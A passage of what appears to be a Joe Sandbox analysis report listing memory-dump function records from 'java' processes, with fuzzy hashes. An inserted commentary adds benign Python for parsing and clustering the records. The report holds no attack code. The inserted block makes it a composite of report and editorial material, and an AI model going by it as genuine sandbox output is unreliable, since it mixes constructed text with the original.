                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 9N_^
                                                                                  • API String ID: 0-1737749909
                                                                                  • Opcode ID: bf236bfa54dcd35ed806c54f6f99c3ae12b160d4b2edc48b6e41b1883c96dd3e
                                                                                  • Instruction ID: 8f904fd4e380cb8cc302031f369c05a129f2d96fad9888af4bf460e97bb5c13f
                                                                                  • Opcode Fuzzy Hash: bf236bfa54dcd35ed806c54f6f99c3ae12b160d4b2edc48b6e41b1883c96dd3e
                                                                                  • Instruction Fuzzy Hash: 06614937B1892A9BE721B7FCF4612FD7BA5EF85325B540576C10CD7283CD2868868790
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4N_^
                                                                                  • API String ID: 0-2516135240
                                                                                  • Opcode ID: e045c3968787271ff8c63079ef82fcd6fb7fc9d22733e076c21e2e123d48014d
                                                                                  • Instruction ID: 56f23192b82b3c4c57669e1caa31e5644c634e1cdf6b63a8e267d8c8528ee6a1
                                                                                  • Opcode Fuzzy Hash: e045c3968787271ff8c63079ef82fcd6fb7fc9d22733e076c21e2e123d48014d
                                                                                  • Instruction Fuzzy Hash: D151F621B1DA861FE3A6A77C98662BA3BD6DF8722070940FBD58CC7193DC1C5C469352
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: <N_^
                                                                                  • API String ID: 0-1347224999
                                                                                  • Opcode ID: 99e652355885f1711ab3d3df5e4f3541c775224f3f08c2d9b35d37d308dfbb97
                                                                                  • Instruction ID: 054c537cfbcde7e64352502ad40509f72512e31363326587cd5044e9dd1abc63
                                                                                  • Opcode Fuzzy Hash: 99e652355885f1711ab3d3df5e4f3541c775224f3f08c2d9b35d37d308dfbb97
                                                                                  • Instruction Fuzzy Hash: 8141F336B09A959FD362EBBCE8B12FD3B61EF8521478444FAD049CB393DD2868858741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e0c7d95025cb94886eac889bcb6e673fa63bc18bbc7d4d8f7014a18c2faa1ab0
                                                                                  • Instruction ID: 1f202e06898455505d30a1d30741e62dd16c72c20e074fc51544231090c1fdee
                                                                                  • Opcode Fuzzy Hash: e0c7d95025cb94886eac889bcb6e673fa63bc18bbc7d4d8f7014a18c2faa1ab0
                                                                                  • Instruction Fuzzy Hash: 10419527B0CA666AE732B7BCB4720EE7B94DF42339B084177D1CC99493DD1968858784
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 619bc98cd2f2d9741a502a37fee1604ab9da164fbb8ff489d112dc33d7a275a4
                                                                                  • Instruction ID: 6dd8299f0cab4375c10fb134f7601a08f5d310120cdc043fdd81f2ef774c820d
                                                                                  • Opcode Fuzzy Hash: 619bc98cd2f2d9741a502a37fee1604ab9da164fbb8ff489d112dc33d7a275a4
                                                                                  • Instruction Fuzzy Hash: 18218323B1D6955FE722A7BC58B51EE7BB1AF43224B4901F7D188DA093DD1C68458381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ad91198da5a2d0256b6d8337b87e4961c2e28c6b5f3b223e37e25b4f9ed17e3
                                                                                  • Instruction ID: 51206d0f65c179d685de89338682401b24a8e65a6a4ec0ff789958c2444f5492
                                                                                  • Opcode Fuzzy Hash: 0ad91198da5a2d0256b6d8337b87e4961c2e28c6b5f3b223e37e25b4f9ed17e3
                                                                                  • Instruction Fuzzy Hash: 11A12927708A669BD721BBBCB8612EE7BA1EF85371B040577C24DDB183C928648687D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 097a40d4473be29e4b96529a1de9bf9a88dfc623436839634baa08efe4b14a25
                                                                                  • Instruction ID: 6ac28a05ad86f672d053929270cfa638e98e56551339a19dfaa4fa55fc2fc091
                                                                                  • Opcode Fuzzy Hash: 097a40d4473be29e4b96529a1de9bf9a88dfc623436839634baa08efe4b14a25
                                                                                  • Instruction Fuzzy Hash: FF914927B089269BE721BBBCF8512EE7BA4EF85371B444577C24DCB183CD28648687D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f924f07c80915c554aa23be428a20302eaf02ad14ad57236c975f4ba42d173a
                                                                                  • Instruction ID: 3fc83cc40e00ec8730bc07921e71058d0944cb272091430d0c7afd2fcd3be0d4
                                                                                  • Opcode Fuzzy Hash: 6f924f07c80915c554aa23be428a20302eaf02ad14ad57236c975f4ba42d173a
                                                                                  • Instruction Fuzzy Hash: D0814927B089269AE721BBBCF8612EE7BA5EF85371B044577C24DD7183CD246886C7D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e19c33278c087017ef690c28973a618c5d41e18390640a9229773cc78a3e8f97
                                                                                  • Instruction ID: 25b11ab19120c8306a83693e260d1653917fc42e267833357f7f808f669e67de
                                                                                  • Opcode Fuzzy Hash: e19c33278c087017ef690c28973a618c5d41e18390640a9229773cc78a3e8f97
                                                                                  • Instruction Fuzzy Hash: 8F814A27B089269AE721BBBCF8512EE7BA5EF85371B044577C24DD7183CD246886C7D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 636d41d66d2073637b59393edbb24920e6e39050c4275368070a09560804504c
                                                                                  • Instruction ID: 21d2d3c830e7d22779f9a6ff637161c7fdb649ce16b6a829809b8615da73d539
                                                                                  • Opcode Fuzzy Hash: 636d41d66d2073637b59393edbb24920e6e39050c4275368070a09560804504c
                                                                                  • Instruction Fuzzy Hash: BB714937B089269BE721BBBCF8612EE7BA5EF85361B140576C14DD7183CD286886C7D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5f12eb3221f8b128eadd5c01951f387c2faf88d2dda06b7dc5d5e0f9d282ff61
                                                                                  • Instruction ID: 79819e542a17ade8b0a030cf602edd7bc1c7f6505325b5fe613e62034f41d7a6
                                                                                  • Opcode Fuzzy Hash: 5f12eb3221f8b128eadd5c01951f387c2faf88d2dda06b7dc5d5e0f9d282ff61
                                                                                  • Instruction Fuzzy Hash: E9510563B1DA855FD362EBBCE8B11F93FA1EF4221478445FAD088CB393DD2868458741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 21a215b8b9611c717a068e7545ea95d52d6b26a696d333c3de6ab9d10eba4caf
                                                                                  • Instruction ID: b03c26dd0a01e1997b84e4d05d8400d6c1ad2513aa127023559686da0eb742d4
                                                                                  • Opcode Fuzzy Hash: 21a215b8b9611c717a068e7545ea95d52d6b26a696d333c3de6ab9d10eba4caf
                                                                                  • Instruction Fuzzy Hash: 6E31D321B189490FEBA8FB6C946A378B6D6EF99315F1405BEF40ED32D3DD68AC418340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 90c42868ca3a7a4f11fe485ab135026aff4053cc574e9e3f6f22445bc6dadd62
                                                                                  • Instruction ID: e156fca14a7f344b80634bf525cb086e92ffab962cf80b902d943ab78a9ccd5f
                                                                                  • Opcode Fuzzy Hash: 90c42868ca3a7a4f11fe485ab135026aff4053cc574e9e3f6f22445bc6dadd62
                                                                                  • Instruction Fuzzy Hash: E731C522B28E595FEB54B7AC586A3BD77D5EF99311F04027AE00DD3293DD2C6C414351
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 807c1ca4edf272fee2ab5c83110810aa3bc0c44abbf182961e59e41f964d182f
                                                                                  • Instruction ID: 50c2a0619644721272b58aeb78bd83ff4f10bb170c5ff1af817ba156dd316ce2
                                                                                  • Opcode Fuzzy Hash: 807c1ca4edf272fee2ab5c83110810aa3bc0c44abbf182961e59e41f964d182f
                                                                                  • Instruction Fuzzy Hash: 7041B270B18A4A9FEB54EBB8D8656FD7BB2FF99301F5005B9D009E3282DD386841C750
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 59b3429d72c33e08d17dcd5d64ca6a350669493ef4d7ad950aee33235fd5b913
                                                                                  • Instruction ID: bf71fa4012a5fff66e78bde5aedbcbdd244697faa4652c3d3181a9f40b5bc01e
                                                                                  • Opcode Fuzzy Hash: 59b3429d72c33e08d17dcd5d64ca6a350669493ef4d7ad950aee33235fd5b913
                                                                                  • Instruction Fuzzy Hash: F5219471B58A898FD7A1EBB8C4B55BD7F72BF89200BC045E9D409C3397DD286D408B51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 81bb1881dee46a5cc1cbaf8eb4910e0d3f2c4fee7f998d71d56e49c260df6c3f
                                                                                  • Instruction ID: ee223b2cad0cb4a7de3afa95f3515158c5f37c37345a4c9cd61019a692b41b7a
                                                                                  • Opcode Fuzzy Hash: 81bb1881dee46a5cc1cbaf8eb4910e0d3f2c4fee7f998d71d56e49c260df6c3f
                                                                                  • Instruction Fuzzy Hash: 6201F414A2C6814FE785A73858A45757FE19FD6250B8808AAEC88C61A7EC4CA9858392
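The records above, and the process-22 records that follow, are the report's per-function entries: each names the memory dump the function was recovered from (a region "based on PE: false", so not backed by an image on disk), the snapshot file, and an opcode and an instruction fuzzy hash. The Python below is an added example, not part of the report and not Joe Sandbox code: it parses records in exactly this layout, decodes the process index, dump index and base address from the .sdmp file name (those three fields are confirmed by the Snapshot File name on the same record; the remaining fields of the name are deliberately left undecoded), and groups records whose instruction fuzzy hashes are near-identical. The nibble-wise distance is this example's own stand-in metric, since the report does not say how Joe Sandbox compares fuzzy hashes. The embedded sample is three records copied from this page (two from process 21, one from process 22).

```python
# Added example (not Joe Sandbox code): parse the function records above and
# compare their instruction fuzzy hashes. The nibble-distance metric is this
# example's own stand-in; Joe Sandbox does not publish its comparison method.
import re

# Constructed excerpt: three records copied verbatim from this report.
SAMPLE = """\
Memory Dump Source
• Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 097a40d4473be29e4b96529a1de9bf9a88dfc623436839634baa08efe4b14a25
• Instruction ID: 6ac28a05ad86f672d053929270cfa638e98e56551339a19dfaa4fa55fc2fc091
• Opcode Fuzzy Hash: 097a40d4473be29e4b96529a1de9bf9a88dfc623436839634baa08efe4b14a25
• Instruction Fuzzy Hash: FF914927B089269BE721BBBCF8512EE7BA4EF85371B444577C24DCB183CD28648687D0
Memory Dump Source
• Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f924f07c80915c554aa23be428a20302eaf02ad14ad57236c975f4ba42d173a
• Instruction ID: 3fc83cc40e00ec8730bc07921e71058d0944cb272091430d0c7afd2fcd3be0d4
• Opcode Fuzzy Hash: 6f924f07c80915c554aa23be428a20302eaf02ad14ad57236c975f4ba42d173a
• Instruction Fuzzy Hash: D0814927B089269AE721BBBCF8612EE7BA5EF85371B044577C24DD7183CD246886C7D0
Strings
Memory Dump Source
• Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
Similarity
• API ID:
• String ID: 9O_^
• API String ID: 0-1716625314
• Opcode ID: 346b68240c00f7f2b0d605e82acc6ed0312cf6009a0c9862f7d9a78979afdb3b
• Instruction ID: 46ea2e58c827153a41a5662480ba9fddce25449b8018430309656b1227a05b75
• Opcode Fuzzy Hash: 346b68240c00f7f2b0d605e82acc6ed0312cf6009a0c9862f7d9a78979afdb3b
• Instruction Fuzzy Hash: 8A617977B0895A9AE721BBBCA4616FD37A1EFC5325B040576C10DDB283CD2878C683D0
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# .sdmp name: <process index>.<dump index>.<id>.<base address>.<...>.sdmp
# Only fields 1, 2 and 4 are decoded; they are confirmed by the Snapshot File
# name on the same record. The other fields are not documented on this page.
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.\d+\.([0-9A-Fa-f]{16})\.")
SNAP_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(\w+)\.jbxd$")

def parse_records(text):
    """One dict per record; a record starts at 'Memory Dump Source'. 'Strings',
    'Similarity' and 'Joe Sandbox IDA Plugin' are labels without values, and
    field lines seen before the first record header (a page cut mid-record)
    are skipped."""
    records = []
    for line in (l.strip() for l in text.splitlines()):
        if line == "Memory Dump Source":
            records.append({})
        elif records and (m := FIELD_RE.match(line)):
            records[-1][m.group(1).strip()] = m.group(2).strip()
    return records

def describe_source(rec):
    """Decode process index, dump index and base address from the .sdmp name
    and cross-check them against the snapshot file name."""
    src, _, rest = rec["Source File"].partition(",")  # "<file>, Offset: ..., based on PE: ..."
    m, s = SDMP_RE.match(src), SNAP_RE.match(rec["Snapshot File"])
    if not (m and s):
        raise ValueError(f"unexpected naming: {src!r} / {rec['Snapshot File']!r}")
    proc, dump, base = (int(g, 16) for g in m.groups())
    return {
        "process_index": proc, "dump_index": dump, "base": base,
        "process_name": s.group(4),
        "pe_backed": rest.rsplit(":", 1)[1].strip() == "true",
        "consistent": (proc, dump, base) == (int(s.group(1)), int(s.group(2)), int(s.group(3), 16)),
    }

def nibble_distance(a, b):
    """Count hex digits that differ at the same position (0 = identical)."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes differ in length")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))

def cluster_by_instruction_hash(records, threshold=0.8):
    """Greedy clustering: join the first cluster whose representative is at
    least `threshold` similar, else start a new one. Returns record indices."""
    clusters = []
    for i, rec in enumerate(records):
        h = rec["Instruction Fuzzy Hash"]
        for c in clusters:
            ref = records[c[0]]["Instruction Fuzzy Hash"]
            if 1 - nibble_distance(h, ref) / len(h) >= threshold:
                c.append(i)
                break
        else:
            clusters.append([i])
    return clusters
```

Feed the whole "Executed Functions" section to `parse_records` instead of `SAMPLE` to process the full report. On the sample, `describe_source` reports process 21 and 22, both named java, both from regions that are not PE-backed, with the .sdmp and snapshot names agreeing; `cluster_by_instruction_hash` puts the two process-21 functions together (they differ in 12 of 70 hex digits) and leaves the process-22 function on its own. The 0.8 threshold is an illustration value, not one the report uses.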
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1be502e86345554b9046409cb0eee0e049f25aa203b09fdc60519b127997c1f
                                                                                  • Instruction ID: 5d84ad6c374d307aea71cc5e927ce31f30fad6528e652ffa5f5f738dbb117897
                                                                                  • Opcode Fuzzy Hash: a1be502e86345554b9046409cb0eee0e049f25aa203b09fdc60519b127997c1f
                                                                                  • Instruction Fuzzy Hash: E632B461B28A468FE7A4EB6C84B927D77D2FF99300F4405B9E04ED3296DD28BC4197C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1ef5b00c8d60e9f14d60c63fdb90a18718ab832232e4ad8492e6f052a1a55376
                                                                                  • Instruction ID: 6343bfa3b8daa53185a9478de8116f599760ed4f12eccd46b891ad5f12107ef9
                                                                                  • Opcode Fuzzy Hash: 1ef5b00c8d60e9f14d60c63fdb90a18718ab832232e4ad8492e6f052a1a55376
                                                                                  • Instruction Fuzzy Hash: 2E22B661B28A458FE7A4EB6884B96BD77D2FF99300F4405B9D00ED32D6DD28BC4197C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f0aad18e9306424e9a20788375bfbf6358fa2dc3ac536eda4d9244d8755d115
                                                                                  • Instruction ID: 156dc0e0f8f378f7925a855f25500b5766efe8659231c47035d95cb56557cf10
                                                                                  • Opcode Fuzzy Hash: 4f0aad18e9306424e9a20788375bfbf6358fa2dc3ac536eda4d9244d8755d115
                                                                                  • Instruction Fuzzy Hash: E251215171E6C94FE796ABB848742767FE5DF87225B1800FBE08CC71A3DD185806C386
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 9O_^
                                                                                  • API String ID: 0-1716625314
                                                                                  • Opcode ID: 346b68240c00f7f2b0d605e82acc6ed0312cf6009a0c9862f7d9a78979afdb3b
                                                                                  • Instruction ID: 46ea2e58c827153a41a5662480ba9fddce25449b8018430309656b1227a05b75
                                                                                  • Opcode Fuzzy Hash: 346b68240c00f7f2b0d605e82acc6ed0312cf6009a0c9862f7d9a78979afdb3b
                                                                                  • Instruction Fuzzy Hash: 8A617977B0895A9AE721BBBCA4616FD37A1EFC5325B040576C10DDB283CD2878C683D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4O_^
                                                                                  • API String ID: 0-2486912895
                                                                                  • Opcode ID: 79a5f2ba61c9862144086888919e704316ff51a6d414c9f9075f0ee51f23c374
                                                                                  • Instruction ID: 13e3e887820deed74d4f091ed1e72a035aa263908aae269df254710c3c8c31a5
                                                                                  • Opcode Fuzzy Hash: 79a5f2ba61c9862144086888919e704316ff51a6d414c9f9075f0ee51f23c374
                                                                                  • Instruction Fuzzy Hash: B251E622B1DAC64FE366A77C58652BA3BD5DF8722170940FBD48CC7293DC1C5C468392
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: <O_^
                                                                                  • API String ID: 0-1368354704
                                                                                  • Opcode ID: 7368a0b1233e308343e5278142a62276f671b6eb155a06b198b49865ea6ed969
                                                                                  • Instruction ID: f8c22ef42b670a477f5c63174e15d20314a6f3600211baf4b3cc47ad49cd61db
                                                                                  • Opcode Fuzzy Hash: 7368a0b1233e308343e5278142a62276f671b6eb155a06b198b49865ea6ed969
                                                                                  • Instruction Fuzzy Hash: C7413837B19A558FD321EBBCA4B41FD3BA1EF85214B8044FAD04DCB29BDD286C859781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bea279493b1a3bbc1f1ac0ff1616fc3b01e91e54b70e59d1f6d45dfefa13fdf7
                                                                                  • Instruction ID: f2fdf0d659ea2270f719591504fc38e796933d649176c9c1b82a361fcfded461
                                                                                  • Opcode Fuzzy Hash: bea279493b1a3bbc1f1ac0ff1616fc3b01e91e54b70e59d1f6d45dfefa13fdf7
                                                                                  • Instruction Fuzzy Hash: A241A527B0C9666AF632B7BCB4710EE7B94DF42238B084577D18C99093DD1868C587D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ea2c70d131063df3e666e6315f2b2ba817a889efc38dbf0026360e1d388ff0f6
                                                                                  • Instruction ID: 8314f008b6d076163d20e2c4d29871de4890f58558d45507804619487cdb0a29
                                                                                  • Opcode Fuzzy Hash: ea2c70d131063df3e666e6315f2b2ba817a889efc38dbf0026360e1d388ff0f6
                                                                                  • Instruction Fuzzy Hash: E621A623B0D6955FE722A7AC54750EE3BB0EF43224F0901B7D188DA093ED1C6C8983D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 261c599f17967b8a2d6c9fbf32e64035db0f08842a65f301b6953482b4d77bf4
                                                                                  • Instruction ID: 98173403bac7f540d883ef8002ce89d9b2794b14b39b757cfca555b0723dffeb
                                                                                  • Opcode Fuzzy Hash: 261c599f17967b8a2d6c9fbf32e64035db0f08842a65f301b6953482b4d77bf4
                                                                                  • Instruction Fuzzy Hash: AFA1382BB089669AE721BBBDB4512ED3BA0EFC5331B044577C14DDB183C92868CAC7D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000002.3015662360.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_22_2_7ffd347f0000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7524c1dfaa8d58777f904de3b9035903bc3fc43504994d6b6c4f52401cbfe10f
                                                                                  • Instruction ID: 89602df52742f7c29e72de3496efe6295faef339bb89f17d28adb3bd2f1bdb38
                                                                                  • Instruction Fuzzy Hash: C9714B37B08A269BE721BBBCB8512EE7BA5EF85361B14457AC14CD7183CD246486C7D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000017.00000002.3354987827.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_23_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b0938630806ad967e4ed98ae388dfb38e8e87eba9c0bdd870a621b81dd75ad6c
                                                                                  • Instruction ID: 87140e62170eab5e00befcc28a6466b3d3a9146013ebc2003143bf929c1367ad
                                                                                  • Opcode Fuzzy Hash: b0938630806ad967e4ed98ae388dfb38e8e87eba9c0bdd870a621b81dd75ad6c
                                                                                  • Instruction Fuzzy Hash: 28514733B1DB855FD321F7BCA8B11E93FA1EF8221478445FAD088DB293DD2869558741
                                                                                  Memory Dump Source
